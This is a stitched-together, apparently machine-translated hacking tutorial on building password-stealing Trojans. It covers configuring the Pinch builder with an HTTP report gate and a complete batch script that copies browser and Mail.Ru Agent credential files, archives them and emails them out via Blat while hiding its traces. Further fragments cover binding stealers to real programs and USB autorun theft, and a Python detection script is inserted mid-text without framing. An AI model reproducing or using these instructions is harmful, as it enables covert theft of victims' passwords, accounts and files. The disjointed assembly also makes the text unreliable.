How to write a Trojan program that steals passwords. We create a Trojan to steal passwords. Instructions for creating a Trojan to steal passwords

People!!!
Now I will tell you how to create your own Trojan virus (almost your own)!

What you need:
brains - 1 pc., computer - 1 pc., Internet access - 1 pc., Pinch (builder) - 1 pc., server (for Trojan reports) - 1 pc., Parser (for decrypting reports).

Perhaps that's all...

Now, as always, a short story.

Trojans
..they were known about 33 centuries ago

In the 12th century BC, Greece declared war on the city of Troy.
The conflict arose when a Trojan prince kidnapped Queen Helen of Sparta and announced that he wanted to make her his wife. This naturally angered the Greeks, especially the king of Sparta. The Greeks besieged Troy for 10 years, but without success, because... Troy was well fortified.
In a last effort, the Greek army pretended to retreat and left behind a huge wooden horse. The Trojans saw the horse and, thinking that it was a gift from the Greeks, dragged the horse into the city, not realizing that the best Greek soldiers were sitting inside the empty wooden horse.
Under the cover of darkness, the soldiers got out, opened the gates of the city and later, together with the remaining army, killed the entire Trojan army. Like the wooden horse, a Trojan horse program pretends to do one thing, but in fact does something completely different.

Alexey Demchenko, a Russian “cool hacker”, is also known as “coban2k”.
The author of many programs; his best (in my opinion) is PINCH, the most common Trojan on the Internet! He knows many programming languages, in particular C++, Pascal, Delphi, MySQL, PHP, XML and many others. In general, I advise you to go to his personal website www.cobans.net, where you will find some information about him.

In particular, we are considering the Pinch program (Pinch 2.58)
Pinch 2.58 is a Builder, a Trojan virus compiler... because... in the builder you will attack certain functions of the Trojan... for example: steal passwords from ICQ, TheBat, FAT, browser cookies (this is the most popular).
BUT that’s not all Pinch can also: create/edit a certain parameter in the Registry, delete itself after completion of work, create a “Blue Screen of Death”, or even better, create a server (console) on the victim’s computer (BackDoor), after which the victim’s computer it is your property (literally). You can carry out DDOS attacks through his computer through his IP address, and at this moment maintain your anonymous sovereignty.
Just don’t think that you can only have one computer at your disposal. You can have as many of them as you want, but this is already called BotNet...

Well, that's all, let's start...

See what the Pinch Builder looks like below:

Figure 1.1

Now I’ll explain how Trojan works...

1. You can compile the Trojan so that reports are sent to the e-mail you specified. But they can burn you (that is, your Trojan) because... your victim may have SP2 (Windows XP Service Pack 2)) which means FireWall also has... FireWall will never turn on (without your permission) port 25 (SMTP) which means your Troy will not be able to send the victim’s report to E-mail. (such well-known mailers as mail.ru, yandex.ru, etc. do not receive reports) Use the mailer http://goolook.ru But still, I do not recommend using SMTP!

2. You can compile the Trojan so that reports are sent to the server you specify.
It's safer because at the time of sending the report, Pinch manifests itself as:
Process name: iexplorer.exe
Protocol: http
Remote address: www.YOUR_SERVER.xxx/get.php
FireWall cannot prevent the “iexplorer.exe” process (and if it could, you wouldn’t see anything on your computer monitor (except for the desktop picture))
Protocol: http:// means port “80” (NO COMMENTS)

So, today we will look at “2nd”, I already said yes (?) that this is better.

Let's look at more races at Builder >>>

Figure 1.1

1. Click on the “HTTP” tab and select the “HTTP” protocol.

2. In the URL field, enter the address of your website (server), for example: http://kuzia_lox.jino-net.ru/mailp_p/mail.php
We will focus on this in more detail...
In order for Pinch to send you reports via http://, you need a server (let’s simply call it a “site”) and so you need a site WHICH PHP SCRIPTS MUST MANDATORY WORK!!! The best of them is http://jino-net.ru
True, I said that there is also http://onepage.ru/ but the server was destroyed.
Let's continue...
So, register on http://jino-net.ru under any domain and any password J).
Have you registered?
I think yes…
Let's continue...
Let's say you registered under the domain http://petia_lox.jino-net.ru
We go to the FTP of your site. Do you know what FTP is? Ehhhh... I'll have to tell you, because I remember myself...
FTP is the content of your site... that is, using the FTP protocol (port 21), you get to the root of your site where different directories/folders/files, etc. are contained.

Let’s go to Google.ru and download the “CuteFTP” program... Perhaps I’ll do it for you.
Let's go here >>>
http://www.google.ru/search?hl=ru&q=CuteFTP+download&btnG=Search+in+Google&lr=
I like the 4th link better.
Download CuteFTP 7.1 + Russifier
Let's go >>>
http://gizmodo.ru/2005/07/23/skachat_cuteftp_7_1__rusifikator/
I think next you will figure out how to download the program and how to install it.

Downloaded, installed, Russified... let's continue...

Now go to your site's FTP. Go to the /docs/ folder, create any folder in this folder, for example “mail_p”, give this folder the rights CHMOD 777 (right-click on the folder in the context menu, find the “CHMOD” or “Properties” parameter in different versions of the CuteFTP program, different translations)
Now upload the get into this folder (mail_p). What is a get?
“Get” this gate script for receiving reports from pinch has the extension “.php”
You can get it here >>>
http://pinch3.ru/other/gate.txt
Create a Notepad text file on your computer and copy the gate text from http://pinch3.ru/other/gate.txt into your text file, then change the text file's extension to .php (it used to be .txt)

The script is ready, rename it “mail” and upload it to the FTP of your website in the folder /docs/mail_p/
And give CHMOD rights to this file 777.

Remember this place, now reports will be sent to this folder where the get is located (/docs/mail_p/).

So we write in the URL field (in the builder if you haven’t forgotten yet)
http://petia_lox.jino-net.ru/mail_p/mail.php (you have your own address)

3. Let's look >>>

Figure 1.2

Make all the checkboxes like I have in Figure 1.2
Do not check the box above the “Opera” parameter, otherwise the report will not be decrypted (read below).

You can already compile... but we will also look at other additional (although they are sometimes even required) functions...

“PWD” tab we already know what it is)
The “Run” tab is for ummmm, let’s say, to improve Pinch’s intelligence, that is, for deleting itself, for saving your .dlls in Windows and much more.
Spy tab. Send a screenshot of the victim’s monitor to save IE KeyLog, etc.
“NET” tab for PHP console commands notify/ I don’t know the rest...
My beloved BegDor has never used the “BD” tab from Pinch’a...
The “etc” tab for compressing the Trojan, for changing the Trojan icon.
“Kill” tab for killing any processes (for example FireWall)
“IE” tab: manage IE, add a site to favorites, follow a link.
I don’t know the “Worm” tab... something to do with DNSsecs.
The “IRC-bot” tab is basically for the bottrack. BOTNET rules)!!!

Return to the PWD tab and click the button (bottom) “COMPILE”

HOORAY!!! TROJAN IS READY!!!

In this article I will describe how quickly and without much difficulty you can write and make a virus that steals files with passwords and sends it all to your mailbox.
Let's start with the fact that the virus will be written in bat"e (CMD, you can take the basic commands) that is, in a regular text file and will be executed using the standard built-in Windows interpreter - the "command line".
In order to write such a virus, you need to know the exact storage location of the files that it will steal, Blat components that can be downloaded from the off-site http://www.blat.net/ or from our server, as well as a component from the WinRaR archiver Rar.exe (you can do without it).
Open notepad and copy the following code there:

@echo off md %systemroot%\wincs md %SystemDrive%\pass\ md %SystemDrive%\pass\opera\ md %SystemDrive%\pass\Mozilla\ md %SystemDrive%\pass\MailAgent\ md %SystemDrive%\pass\ MailAgent\reg attrib %systemroot%\wincs +h +s +r attrib %SystemDrive%\pass +h +s +r copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe" copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll" copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib" CD /D % APPDATA%\Opera\Opera\ copy /y wand.dat %SystemDrive%\pass\opera\wand.dat copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.da regedit.exe -ea %SystemDrive%\ pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2 regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent_3.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\ magent_logins3 CD /D %APPDATA% Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul Xcopy Mra\Update\ver.txt %SystemDrive%\pass\ MailAgent /K /H /G /Q /R /S /Y >nul cd %AppData%\Mozilla\Firefox\Profiles\*.default\ copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar .exe >nul del /s /q %SystemRoot%\Rar.exe %SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\ copy /y %SystemDrive%\ pass\pass.rar %systemroot%\wincs\pass.rar cd %systemroot%\wincs %systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password ren *.rar pass.rar %systemroot%\wincs\blat.exe -body FilesPassword -to [email protected] -attach %systemroot%\wincs\pass.rar rmdir /s /q %SystemDrive%\ pass rmdir /s /q %systemroot%\wincs del /s /q %systemroot%\blat.exe del /s /q %systemroot%\blat.dll del /s /q %systemroot%\blat.lib attrib +a +s +h +r %systemroot%\wind.exe EXIT cls

I won’t write much about the code of the boot itself.
@echo off - hides the body of the batinka (so it’s not needed, but still)
md %systemroot%\wincs - creates the wincs folder in the Windows system folder, regardless of what drive it is installed on or what it is named.
md %SystemDrive%\pass\ - creates the pass folder on the disk where the Windows system is installed.
md %SystemDrive%\pass\opera\ - creates the opera folder where wand.dat and cookies4.dat from the Opera browser will be copied in the future (up to 11* versions, Opera stores its passwords in the wand.dat file)
md %SystemDrive%\pass\Mozilla\- creates a Mozilla folder where files from the Mozilla browser (cookies.sqlite, key3.db, signons.sqlite) in which passwords are stored will be copied in the future.
md %SystemDrive%\pass\MailAgent\- creates a MailAgent folder into which files containing the correspondence history and registry keys (which store passwords) from Mail Agent will be copied.
md %SystemDrive%\pass\MailAgent\reg- creates a reg folder
attrib %systemroot%\wincs +h +s +r- puts attributes on the wincs folder, thereby hiding it from view.
attrib %SystemDrive%\pass +h +s +r- the same as above.
copy /y "%systemroot%\blat.exe" "%systemroot%\wincs\blat.exe"- copies the blat.exe file from the upload location to the wincs folder
copy /y "%systemroot%\blat.dll" "%systemroot%\wincs\blat.dll"- copies the blat.dll file from the upload location to the wincs folder
copy /y "%systemroot%\blat.lib" "%systemroot%\wincs\blat.lib"- copies the blat.lib file from the upload location to the wincs folder
CD /D %APPDATA%\Opera\Opera\ - goes to the opera folder where files with passwords (and other things) for the opera are located.
copy /y wand.dat %SystemDrive%\pass\opera\wand.dat- copies the wand.dat file to the opera folder
copy /y cookies4.dat %SystemDrive%\pass\opera\cookies4.dat- copies the cookie4.dat file to the opera folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2- exports the registry key magent_logins2, where the password is stored, to the reg folder
regedit.exe -ea %SystemDrive%\pass\MailAgent\reg\agent.reg "HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins3- exports the registry key magent_logins3, where the password is stored, to the reg folder
CD /D %APPDATA% - go to the AppData folder
Xcopy Mra\Base %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y /E >nul- copies the contents of the Mra\Base folder to the MailAgent folder
Xcopy Mra\Update\ver.txt %SystemDrive%\pass\MailAgent /K /H /G /Q /R /S /Y >nul- copies the ver.txt file to the MailAgent folder
cd %AppData%\Mozilla\Firefox\Profiles\*.default\- go to the folder with the Mozilla browser profile
copy /y cookies.sqlite %SystemDrive%\pass\Mozilla\cookies.sqlite- copies the cookies.sqlite file to the Mozilla folder
copy /y key3.db %SystemDrive%\pass\Mozilla\key3.db- copies the key3.db file to the Mozilla folder
copy /y signons.sqlite %SystemDrive%\pass\Mozilla\signons.sqlite- copies the signons.sqlite file to the Mozilla folder
copy /y %Windir%\Rar.exe %SystemDrive%\pass\Rar.exe >nul- copies the WinRar Rar.exe archiver component to the pass folder
del /s /q %SystemRoot%\Rar.exe- removes the archiver component from the Windows folder
%SystemDrive%\pass\rar.exe a -r %SystemDrive%\pass\pass.rar %SystemDrive%\pass\- archive the contents of the pass folder
copy /y %SystemDrive%\pass\pass.rar %systemroot%\wincs\pass.rar copy the created archive to the wincs folder
cd %systemroot%\wincs - go to the wincs folder
%systemroot%\wincs\blat.exe -install -server smtp.yandex.ru -port 587 -f [email protected] -u login -pw Password - prepares the Blat program to send the archive by specifying the data for authorization and sending the letter. Do not forget to indicate your data from the mailbox from where the letter with the archive will be sent.
ren *.rar pass.rar - just in case if the archive did not take the wrong name during the process, we will rename it again to pass.rar
%systemroot%\wincs\blat.exe -body Files Password -to [email protected] -attach %systemroot%\wincs\pass.rar- indicate to which postal address the letter will be sent and send it.
rmdir /s /q %SystemDrive%\pass- delete the pass folder
rmdir /s /q %systemroot%\wincs- delete the wincs folder
del /s /q %systemroot%\blat.exe
del /s /q %systemroot%\blat.dll- remove Blat components from the Windows folder.
del /s /q %systemroot%\blat.lib- remove Blat components from the Windows folder.
attrib +a +s +h +r %systemroot%\wind.exe- we put attributes on ourselves, thereby hiding ourselves from view.
EXIT - we complete the batinka process and exit.
cls - clear the output of any lines in the interpreter.
Copied, saved as wind.bat and compiled into exe using the Bat to exe converter program, then we put everything together, that is, we take the components of the Blat program and the WinRar archiver component (you can download) and glue them into one executable file, or with which one any program, the path for uploading all files should be %SystemRoot% or %WindowsDir% or %windir% .
As a result, we get a virus that will not be picked up by antiviruses and will send an archive with files to your email. The files that arrive by email can be decrypted using multi-password-recovery, although not all of them, but only wand.dat from the opera and then if it has not been updated to 11*versions. All other files can be decrypted by replacing them with your own.
I think we can finish here, but if you have any questions, don’t hesitate to ask.
Thank you for your attention, all the best!
©SwAp TheHackWorld.in
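Seen from the defending side, the batch file walked through above leaves a recognisable chain of process launches under one parent. The following is an added example, not code from the original article: it correlates constructed process-creation events by parent process, and the event fields (`host`, `ppid`, `image`, `cmd`), the rule names and the sample hosts and addresses are assumptions.

```python
import re
from collections import defaultdict

# Each rule: (image basename, pattern on the logged command line).
# Only external programs appear here. md, copy, ren, del and rmdir are cmd.exe
# built-ins and produce no process-creation event; file telemetry covers them.
RULES = {
    "attrib_hide": ("attrib.exe", re.compile(r"(?=.*\+h)(?=.*\+s)", re.I)),
    "mailagent_reg_dump": ("regedit.exe",
        re.compile(r"[-/]ea?\s.*Mail\.Ru\\Agent\\magent_logins", re.I)),
    "mailagent_xcopy": ("xcopy.exe", re.compile(r"\bMra\\(Base|Update)", re.I)),
    "rar_archive": ("rar.exe", re.compile(r"\sa\s", re.I)),
    "blat_smtp_setup": ("blat.exe", re.compile(r"-install\b.*-server\b", re.I)),
    "blat_attach_send": ("blat.exe", re.compile(r"-attach\b", re.I)),
}
SEND_RULES = {"blat_smtp_setup", "blat_attach_send"}


def match_rules(event):
    """Return the names of all rules that one process-creation event hits."""
    name = event["image"].rsplit("\\", 1)[-1].lower()
    return {rule for rule, (exe, pattern) in RULES.items()
            if name == exe and pattern.search(event["cmd"])}


def find_chains(events, min_rules=3):
    """Group hits by (host, parent pid) and keep parents whose children hit
    at least min_rules distinct rules, one of them a mail-sending step.
    rar.exe and blat.exe are legitimate admin tools, so a single hit is noise."""
    hits = defaultdict(set)
    for ev in events:
        hits[(ev["host"], ev["ppid"])] |= match_rules(ev)
    return {key: sorted(rules) for key, rules in hits.items()
            if len(rules) >= min_rules and rules & SEND_RULES}


# Constructed sample events (environment variables already expanded, as they
# would be in a process-creation log). Hosts and addresses are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-07", "ppid": 4120, "image": r"C:\Windows\System32\attrib.exe",
     "cmd": r"attrib C:\Windows\wincs +h +s +r"},
    {"host": "WS-07", "ppid": 4120, "image": r"C:\Windows\regedit.exe",
     "cmd": r'regedit.exe -ea C:\pass\MailAgent\reg\agent.reg '
            r'"HKEY_CURRENT_USER\software\Mail.Ru\Agent\magent_logins2"'},
    {"host": "WS-07", "ppid": 4120, "image": r"C:\Windows\System32\xcopy.exe",
     "cmd": r"Xcopy Mra\Base C:\pass\MailAgent /K /H /G /Q /R /S /Y /E"},
    {"host": "WS-07", "ppid": 4120, "image": r"C:\pass\Rar.exe",
     "cmd": r"C:\pass\rar.exe a -r C:\pass\pass.rar C:\pass"},
    {"host": "WS-07", "ppid": 4120, "image": r"C:\Windows\wincs\blat.exe",
     "cmd": r"C:\Windows\wincs\blat.exe -install -server smtp.example.test "
            r"-port 587 -f sender@example.test -u login -pw Password"},
    {"host": "WS-07", "ppid": 4120, "image": r"C:\Windows\wincs\blat.exe",
     "cmd": r"C:\Windows\wincs\blat.exe -body FilesPassword "
            r"-to rcpt@example.test -attach C:\Windows\wincs\pass.rar"},
    # Benign: a nightly admin job that archives logs and mails the archive.
    {"host": "WS-12", "ppid": 988, "image": r"C:\Program Files\WinRAR\Rar.exe",
     "cmd": r"Rar.exe a D:\backup\logs.rar D:\logs"},
    {"host": "WS-12", "ppid": 988, "image": r"C:\Tools\blat.exe",
     "cmd": r"blat.exe -body Nightly -to ops@example.test "
            r"-attach D:\backup\logs.rar"},
]

if __name__ == "__main__":
    for (host, ppid), rules in find_chains(SAMPLE_EVENTS).items():
        print(f"{host} parent pid {ppid}: {', '.join(rules)}")
```

The threshold of three distinct rules is a tuning choice: lowering it to two also reports the benign backup job in the sample data.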


Hacking How to create a Trojan virus. Pinch (for lamers)


Notes of a young admin

A couple of days ago, one of my friends left graffiti on my contact wall with a message that he hacked my account, etc. there was a link to the site vk-****.msk.ru. Well, yes. Of course.) I immediately wrote to him to get him treated and change his password. But the link still interested me, although I knew for sure that it was a Trojan (that’s what interested me). I decided to follow this link. As a result, I was offered to download a program that supposedly takes advantage of a recently discovered contact vulnerability and allows you to hack any account.

Instructions for creating a Trojan to steal passwords


How to create a Trojan

Get ready, we have to write two programs at once. One will be on your machine (client), the other will need to be thrown to the victim (server). There will be a lot of work, so fewer words, and closer to the body.

So, launch Delphi or if you already have it running, then create a new project (“File” – “New Application”). Now we will get down to the server part of the Trojan.

Here you should move “From1” from the “Auto-Create forms” section (list on the left) to “Available forms” (list on the right), as I did.

How to create a Trojan

I think every reader knows the origin and meaning of the saying “Trojan horse”. The principle of operation of the Trojan virus is approximately the same (which is why it got its name). There are many types of this virus, today I will focus on one of the options for creating a Trojan program based on the developments of Alexey Demchenko or, as he is also called, “aka coban2k”, who is the author of a huge number of programs, including PINCH, which has become the most a common Trojan on the World Wide Web!

How to create a Trojan program.

We made Trojans and now we are also making a Trojan to steal passwords!

Here I will tell you how to make a simple Trojan to steal passwords from ICQ, Vkontakte, Odnoklassniki, Mail, etc.

Now open the file “1.bat” with notepad. and change the words “Login” to your login from Yandex mail. and change the word “Password” to your Yandex mail password.

We wait. download complete.

We create a Trojan that steals all passwords from browsers (as promised)

So first we need to download the UFR stealer program, this can be done on the official website vazonez.com or via the link >> http://rghost.ru/55883641

Then we go to “build options” and click change icon so that our Trojan looks like a real program, or click merge files (it’s better for the victim to launch the program with which the trojan was glued together, and together with the program the Trojan itself)

Creating a Trojan to Steal Passwords

The virus's operating plan is as follows: it is launched, it scans all folders on the PC and copies the necessary files (by mask, for example, *.txt. pass*, etc.) to a flash drive.

Enables an extended command processing mode, i.e., it allows complex constructions such as two commands in one condition and others. Don’t laugh, because for Batch this is very cool.

Next, you need to remember the path to the directory from where the batch file was launched (we must copy the data to our flash drive, and not to some hard drive) because the code that comes next confuses the value of the CD variable (current working folder).

At the end of the Trojan's work, it will create a ready.txt file so that we know that it has finished working (we will make the Trojan invisible, without a console).


Trojans #9

Antivirus Stealer - unzip this program, copy 2 files and a folder to a flash drive (Antivirus.bat,autorun.inf,prog) and you can go with your friends with the flash drive! You insert the flash drive into the computer, click Antivirus.bat, when it stops you can close it and take out the flash drive, all the passwords that you have on your computer on the flash drive, they will be stored in the “prog” -> “log” folder.

Here I will tell you how to make a simple Trojan to steal passwords from ICQ, Vkontakte, Odnoklassniki, Mail... etc., etc....
Let's get started... first we need some programs:
Multi Password Recovery is a utility for recovering forgotten passwords
blat is an email client.
Bat to Exe converter - bat-exe format converter.
You can download all this in one archive:



Download and unpack into a separate folder...
Now open the file "1.bat" with notepad... and change the words "Login" to your login from Yandex mail... and change the word "Password" to your password from Yandex mail...



Save and close...
Now open "Bat_To_Exe_Converter"...
In the "Batch file" field, indicate the file you saved "1.bat"
The "Save as" field cannot be changed...
Set the settings as shown below:



Now let's go to the "Include" tab...
And transfer there all the files from the "blat" and "MPR..." folders.



There should be exactly seven of them!!! As shown above!!!
Well, now let’s add an icon to our Trojan... this is not necessary, but it looks more like some kind of program...
Go to the "Versioninformations" tab and in the "Icon fie" field select the icon....
Click "Compile"...
We are waiting... for the download to complete... and check the folder with the file "1.bat"... your Trojan "1.exe" should have appeared there (You can call it whatever you like)...
Well, now let’s check... launch the Trojan on our computer and wait... in 30 seconds... a file will be sent to your email... download it (passwords are stored in it)
Downloaded... now we launch it through "MPR" and admire the passwords